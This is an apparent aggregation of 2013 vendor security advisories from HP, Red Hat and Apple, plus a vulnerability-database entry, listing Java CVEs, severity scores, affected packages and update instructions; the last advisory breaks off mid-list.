CVE-2013-0419 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0423 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0424 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0425 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0426 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0427 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0428 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0429 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2013-0433 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0434 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0435 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0438 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3
CVE-2013-0440 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2013-0441 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0442 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0443 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0
CVE-2013-0445 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0446 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0450 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0809 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1473 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-1475 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1476 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1478 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1480 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1481 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1493 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following Java version upgrade to resolve these
vulnerabilities.
The upgrade is available from the following location
http://www.hp.com/java
OS Version
Release Version
HP-UX B.11.11, B.11.23, B.11.31
JDK and JRE v6.0.18 or subsequent
MANUAL ACTIONS: Yes - Update
For Java v6.0 update to Java v6.0.18 or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
HP-UX B.11.23
===========
Jdk60.JDK60-COM
Jdk60.JDK60-PA20
Jdk60.JDK60-PA20W
Jre60.JRE60-COM
Jre60.JRE60-COM-DOC
Jre60.JRE60-PA20
Jre60.JRE60-PA20-HS
Jre60.JRE60-PA20W
Jre60.JRE60-PA20W-HS
Jdk60.JDK60-IPF32
Jdk60.JDK60-IPF64
Jre60.JRE60-COM
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
action: install revision 1.6.0.18.00 or subsequent
HP-UX B.11.23
HP-UX B.11.31
===========
Jdk60.JDK60-COM
Jdk60.JDK60-IPF32
Jdk60.JDK60-IPF64
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
Jre60.JRE60-COM
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
action: install revision 1.6.0.18.00 or subsequent
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) - 3 April 2013 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c02964430
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2013 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits;damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: java-1.7.0-oracle security update
Advisory ID: RHSA-2013:0237-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-0237.html
Issue date: 2013-02-04
CVE Names: CVE-2012-1541 CVE-2012-3213 CVE-2012-3342
CVE-2013-0351 CVE-2013-0409 CVE-2013-0419
CVE-2013-0423 CVE-2013-0424 CVE-2013-0425
CVE-2013-0426 CVE-2013-0427 CVE-2013-0428
CVE-2013-0429 CVE-2013-0430 CVE-2013-0431
CVE-2013-0432 CVE-2013-0433 CVE-2013-0434
CVE-2013-0435 CVE-2013-0437 CVE-2013-0438
CVE-2013-0440 CVE-2013-0441 CVE-2013-0442
CVE-2013-0443 CVE-2013-0444 CVE-2013-0445
CVE-2013-0446 CVE-2013-0448 CVE-2013-0449
CVE-2013-0450 CVE-2013-1473 CVE-2013-1475
CVE-2013-1476 CVE-2013-1478 CVE-2013-1479
CVE-2013-1480 CVE-2013-1489
=====================================================================
1. Summary:
Updated java-1.7.0-oracle packages that fix several security issues are now
available for Red Hat Enterprise Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3.
(CVE-2012-1541, CVE-2012-3213, CVE-2012-3342, CVE-2013-0351, CVE-2013-0409,
CVE-2013-0419, CVE-2013-0423, CVE-2013-0424, CVE-2013-0425, CVE-2013-0426,
CVE-2013-0427, CVE-2013-0428, CVE-2013-0429, CVE-2013-0430, CVE-2013-0431,
CVE-2013-0432, CVE-2013-0433, CVE-2013-0434, CVE-2013-0435, CVE-2013-0437,
CVE-2013-0438, CVE-2013-0440, CVE-2013-0441, CVE-2013-0442, CVE-2013-0443,
CVE-2013-0444, CVE-2013-0445, CVE-2013-0446, CVE-2013-0448, CVE-2013-0449,
CVE-2013-0450, CVE-2013-1473, CVE-2013-1475, CVE-2013-1476, CVE-2013-1478,
CVE-2013-1479, CVE-2013-1480, CVE-2013-1489)
All users of java-1.7.0-oracle are advised to upgrade to these updated
packages, which provide Oracle Java 7 Update 13 and resolve these issues.
All running instances of Oracle Java must be restarted for the update to
take effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/knowledge/articles/11258
5. Bugs fixed (http://bugzilla.redhat.com/):
859140 - CVE-2013-0440 OpenJDK: CPU consumption DoS via repeated SSL ClientHello packets (JSSE, 7192393)
860652 - CVE-2013-1475 OpenJDK: IIOP type reuse sandbox bypass (CORBA, 8000540, SE-2012-01 Issue 50)
906447 - CVE-2013-0431 OpenJDK: JMX Introspector missing package access check (JMX, 8000539, SE-2012-01 Issue 52)
906449 - CVE-2013-1489 Oracle JDK 7: bypass of the security level setting in browser plugin (Deployment, SE-2012-01 Issue 53)
906813 - CVE-2013-0424 OpenJDK: RMI CGIHandler XSS issue (RMI, 6563318)
906892 - CVE-2013-0435 OpenJDK: com.sun.xml.internal.* not restricted packages (JAX-WS, 7201068)
906894 - CVE-2013-1478 OpenJDK: image parser insufficient raster parameter checks (2D, 8001972)
906899 - CVE-2013-0442 OpenJDK: insufficient privilege checking issue (AWT, 7192977)
906900 - CVE-2013-0445 OpenJDK: insufficient privilege checking issue (AWT, 8001057)
906904 - CVE-2013-1480 OpenJDK: image parser insufficient raster parameter checks (AWT, 8002325)
906911 - CVE-2013-0450 OpenJDK: RequiredModelMBean missing access control context checks (JMX, 8000537)
906914 - CVE-2012-1541 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906916 - CVE-2013-0446 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906917 - CVE-2012-3342 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906918 - CVE-2013-0419 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906921 - CVE-2013-0423 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906923 - CVE-2013-0351 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906930 - CVE-2013-0430 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Install)
906932 - CVE-2013-0449 Oracle JDK: unspecified vulnerability fixed in 7u13 (Deployment)
906933 - CVE-2013-1473 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906934 - CVE-2013-0448 Oracle JDK: unspecified vulnerability fixed in 7u13 (Libraries)
906935 - CVE-2013-0438 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
907190 - CVE-2013-1479 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (JavaFX)
907207 - CVE-2013-0428 OpenJDK: reflection API incorrect checks for proxy classes (Libraries, 7197546, SE-2012-01 Issue 29)
907218 - CVE-2013-0444 OpenJDK: MethodFinder insufficient checks for cached results (Beans, 7200493)
907219 - CVE-2013-0432 OpenJDK: insufficient clipboard access premission checks (AWT, 7186952)
907222 - CVE-2013-0437 Oracle JDK: unspecified vulnerability fixed in 7u13 (2D)
907223 - CVE-2012-3213 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Scripting)
907226 - CVE-2013-0409 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (JMX)
907340 - CVE-2013-0443 OpenJDK: insufficient Diffie-Hellman public key checks (JSSE, 7192392)
907344 - CVE-2013-0425 OpenJDK: logging insufficient access control checks (Libraries, 6664509)
907346 - CVE-2013-0426 OpenJDK: logging insufficient access control checks (Libraries, 6664528)
907453 - CVE-2013-0434 OpenJDK: loadPropertyFile missing restrictions (JAXP, 8001235)
907455 - CVE-2013-0427 OpenJDK: invalid threads subject to interrupts (Libraries, 6776941)
907456 - CVE-2013-0433 OpenJDK: InetSocketAddress serialization issue (Networking, 7201071)
907457 - CVE-2013-1476 OpenJDK: missing ValueHandlerImpl class constructor access restriction (CORBA, 8000631)
907458 - CVE-2013-0441 OpenJDK: missing serialization restriction (CORBA, 7201066)
907460 - CVE-2013-0429 OpenJDK: PresentationManager incorrectly shared (CORBA, 7141694)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
java-1.7.0-oracle-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.1.el5_9.i386.rpm
x86_64:
java-1.7.0-oracle-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
java-1.7.0-oracle-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.1.el5_9.i386.rpm
x86_64:
java-1.7.0-oracle-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.i686.rpm
x86_64:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
Red Hat Enterprise Linux HPC Node Supplementary (v. 6):
x86_64:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.i686.rpm
x86_64:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.i686.rpm
x86_64:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2012-1541.html
https://www.redhat.com/security/data/cve/CVE-2012-3213.html
https://www.redhat.com/security/data/cve/CVE-2012-3342.html
https://www.redhat.com/security/data/cve/CVE-2013-0351.html
https://www.redhat.com/security/data/cve/CVE-2013-0409.html
https://www.redhat.com/security/data/cve/CVE-2013-0419.html
https://www.redhat.com/security/data/cve/CVE-2013-0423.html
https://www.redhat.com/security/data/cve/CVE-2013-0424.html
https://www.redhat.com/security/data/cve/CVE-2013-0425.html
https://www.redhat.com/security/data/cve/CVE-2013-0426.html
https://www.redhat.com/security/data/cve/CVE-2013-0427.html
https://www.redhat.com/security/data/cve/CVE-2013-0428.html
https://www.redhat.com/security/data/cve/CVE-2013-0429.html
https://www.redhat.com/security/data/cve/CVE-2013-0430.html
https://www.redhat.com/security/data/cve/CVE-2013-0431.html
https://www.redhat.com/security/data/cve/CVE-2013-0432.html
https://www.redhat.com/security/data/cve/CVE-2013-0433.html
https://www.redhat.com/security/data/cve/CVE-2013-0434.html
https://www.redhat.com/security/data/cve/CVE-2013-0435.html
https://www.redhat.com/security/data/cve/CVE-2013-0437.html
https://www.redhat.com/security/data/cve/CVE-2013-0438.html
https://www.redhat.com/security/data/cve/CVE-2013-0440.html
https://www.redhat.com/security/data/cve/CVE-2013-0441.html
https://www.redhat.com/security/data/cve/CVE-2013-0442.html
https://www.redhat.com/security/data/cve/CVE-2013-0443.html
https://www.redhat.com/security/data/cve/CVE-2013-0444.html
https://www.redhat.com/security/data/cve/CVE-2013-0445.html
https://www.redhat.com/security/data/cve/CVE-2013-0446.html
https://www.redhat.com/security/data/cve/CVE-2013-0448.html
https://www.redhat.com/security/data/cve/CVE-2013-0449.html
https://www.redhat.com/security/data/cve/CVE-2013-0450.html
https://www.redhat.com/security/data/cve/CVE-2013-1473.html
https://www.redhat.com/security/data/cve/CVE-2013-1475.html
https://www.redhat.com/security/data/cve/CVE-2013-1476.html
https://www.redhat.com/security/data/cve/CVE-2013-1478.html
https://www.redhat.com/security/data/cve/CVE-2013-1479.html
https://www.redhat.com/security/data/cve/CVE-2013-1480.html
https://www.redhat.com/security/data/cve/CVE-2013-1489.html
https://access.redhat.com/security/updates/classification/#critical
http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFREE70XlSAg2UNWIIRAl0aAJ9geHwpDX2Kb2LdBP3WSQxnPNr97gCgmyRY
c2rbNUSIrrFwoG5d602o5QY=
=Kt+4
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201302-0065 | CVE-2012-3342 | Oracle Java contains multiple vulnerabilities |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11 and 6 through Update 38 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than other CVEs listed in the February 2013 CPU. Java 7 Update 11, Java 6 Update 38, and earlier versions of Java contain vulnerabilities that can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. This vulnerability February 2013 CPU This is a different vulnerability than the other vulnerabilities listed on the list.Information is obtained by a third party, information is altered, or service operation is interrupted. (DoS) An attack may be carried out.
The vulnerability can be exploited over multiple protocols. This issue affects the 'Deployment' sub-component.
Note: This issue was previously discussed in BID 57670 (Oracle Java Runtime Environment Multiple Security Vulnerabilities) but has been given its own record to better document it.
This vulnerability affects the following supported versions:
7 Update 11, 6 Update 38. In a typical operating environment, these are of low security risk as
the runtime is not used on untrusted applets. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2013-02-19-1 Java for OS X 2013-001 and Mac OS X v10.6
Update 13
Java for OS X 2013-001 and Mac OS X v10.6 Update 13 is now available
and addresses the following:
Java
Available for: OS X Lion v10.7 or later,
OS X Lion Server v10.7 or later, OS X Mountain Lion 10.8 or later
Impact: Multiple vulnerabilities in Java 1.6.0_37
Description: Multiple vulnerabilities existed in Java 1.6.0_37, the
most serious of which may allow an untrusted Java applet to execute
arbitrary code outside the Java sandbox. Visiting a web page
containing a maliciously crafted untrusted Java applet may lead to
arbitrary code execution with the privileges of the current user. For
Mac OS X v10.6 systems, these issues were addressed in Java for Mac
OS X v10.6 Update 13. Further information is available via the Java
website at http://www.oracle.com/technetwork/java/javase/
releasenotes-136954.html
CVE-ID
CVE-2012-3213
CVE-2012-3342
CVE-2013-0351
CVE-2013-0409
CVE-2013-0419
CVE-2013-0423
CVE-2013-0424
CVE-2013-0425
CVE-2013-0426
CVE-2013-0427
CVE-2013-0428
CVE-2013-0429
CVE-2013-0432
CVE-2013-0433
CVE-2013-0434
CVE-2013-0435
CVE-2013-0438
CVE-2013-0440
CVE-2013-0441
CVE-2013-0442
CVE-2013-0443
CVE-2013-0445
CVE-2013-0446
CVE-2013-0450
CVE-2013-1473
CVE-2013-1475
CVE-2013-1476
CVE-2013-1478
CVE-2013-1480
CVE-2013-1481
Java
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 or later, OS X Lion Server v10.7 or later,
OS X Mountain Lion 10.8 or later
Impact: Multiple vulnerabilities in Java
Description: Multiple vulnerabilities existed in Java, the most
serious of which may allow an untrusted Java applet to execute
arbitrary code outside the Java sandbox. Visiting a web page
containing a maliciously crafted untrusted Java applet may lead to
arbitrary code execution with the privileges of the current user.
Further information is available via the Java website at http://www.o
racle.com/technetwork/java/javase/releasenotes-136954.html
CVE-ID
CVE-2013-1486
CVE-2013-1487
CVE-2013-1488
Malware removal
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 or later, OS X Lion Server v10.7 or later,
OS X Mountain Lion 10.8 or later
Description: This update runs a malware removal tool that will
remove the most common variants of malware. If malware is found, it
presents a dialog notifying the user that malware was removed. There
is no indication to the user if malware is not found.
Java for OS X 2013-001 and Java for Mac OS X 10.6 Update 13
may be obtained from the Software Update pane in System Preferences,
Mac App Store, or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/
For Mac OS X v10.6 systems
The download file is named: JavaForMacOSX10.6.Update13.dmg
Its SHA-1 digest is: 5327984bc0b300c237fe69cecf69513624f56b0e
For OS X Lion and Mountain Lion systems
The download file is named: JavaForOSX2013-001.dmg
Its SHA-1 digest is: 145d74354241cf2f567d2768bbd0a7185e7d308a
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJRI/A/AAoJEPefwLHPlZEwDp4QAKz9nfo397KaudpFDey26bsb
GNR8HQ3Z5Ln0ArgwBcc2XabzIYXsjmY7nPdZgq1m0sWgFGWtfQ7qslRooUyNLOsB
WUddu+hQYvPn3CJOZsaPfTA2mfK6Qk9LeyqzUUkZrRNltHnIFMO7uXLEIdrFdnnx
exFMPjbIq+xM5UZgvd/2grtF4DaZHnbcK+t/tDwH09/hGRQ+l+3a/3FB2S1Av85c
FSuiieyrz2NNnDwFCj5NeSFQuK7hr52TiSOEPYI2eiTepyBHrUy03wAe8uwIzQII
RjkY3Nbc8AZt0Q6lq5TgsQbH+vrwVE07nty36uMKmE2vJXyOAIZjfrrwv9SetLwd
QnU5NYMbeHAHmSN5JQfuvDxEfL15/7Jafw2noJGotdrMzs6XQACFIHKqLORdwNkp
sltj3LwykpcyoCR8Dq7NPafqhp2wySaHX8DFSohcq1aa1w+SLDgPCZUAzknwokCL
f/hVQzP6hD0uHP/2jsLjh5g6TgHmCRdR+CKCs7QZaYAUketelRX9YOcgcXzqf5sy
EcbDvJ+rd3KsQ9gIByGwVhHD87NSZDJAyG0ROjMMS9w/7l7nhGxedzGzlyK3oNl/
VpewgZ8FpUrvY80HOPz5XyFmX+HQoSnJ8er6OI5AvHBPn+Z1yHDLS5zpLeDD/wO9
rmbzMJjZUnlCDXoLEVQ9
=qlVo
-----END PGP SIGNATURE-----
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: java-1.7.0-ibm security update
Advisory ID: RHSA-2013:0626-01
Product: Red Hat Enterprise Linux Supplementary
Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-0626.html
Issue date: 2013-03-11
CVE Names: CVE-2012-1541 CVE-2012-3174 CVE-2012-3213
CVE-2012-3342 CVE-2013-0351 CVE-2013-0409
CVE-2013-0419 CVE-2013-0422 CVE-2013-0423
CVE-2013-0424 CVE-2013-0425 CVE-2013-0426
CVE-2013-0427 CVE-2013-0428 CVE-2013-0431
CVE-2013-0432 CVE-2013-0433 CVE-2013-0434
CVE-2013-0435 CVE-2013-0437 CVE-2013-0438
CVE-2013-0440 CVE-2013-0441 CVE-2013-0442
CVE-2013-0443 CVE-2013-0444 CVE-2013-0445
CVE-2013-0446 CVE-2013-0449 CVE-2013-0450
CVE-2013-0809 CVE-2013-1473 CVE-2013-1476
CVE-2013-1478 CVE-2013-1480 CVE-2013-1484
CVE-2013-1485 CVE-2013-1486 CVE-2013-1487
CVE-2013-1493
=====================================================================
1. Summary:
Updated java-1.7.0-ibm packages that fix several security issues are now
available for Red Hat Enterprise Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, ppc, s390x, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Detailed
vulnerability descriptions are linked from the IBM Security alerts page,
listed in the References section. (CVE-2012-1541, CVE-2012-3174,
CVE-2012-3213, CVE-2012-3342, CVE-2013-0351, CVE-2013-0409, CVE-2013-0419,
CVE-2013-0422, CVE-2013-0423, CVE-2013-0424, CVE-2013-0425, CVE-2013-0426,
CVE-2013-0427, CVE-2013-0428, CVE-2013-0431, CVE-2013-0432, CVE-2013-0433,
CVE-2013-0434, CVE-2013-0435, CVE-2013-0437, CVE-2013-0438, CVE-2013-0440,
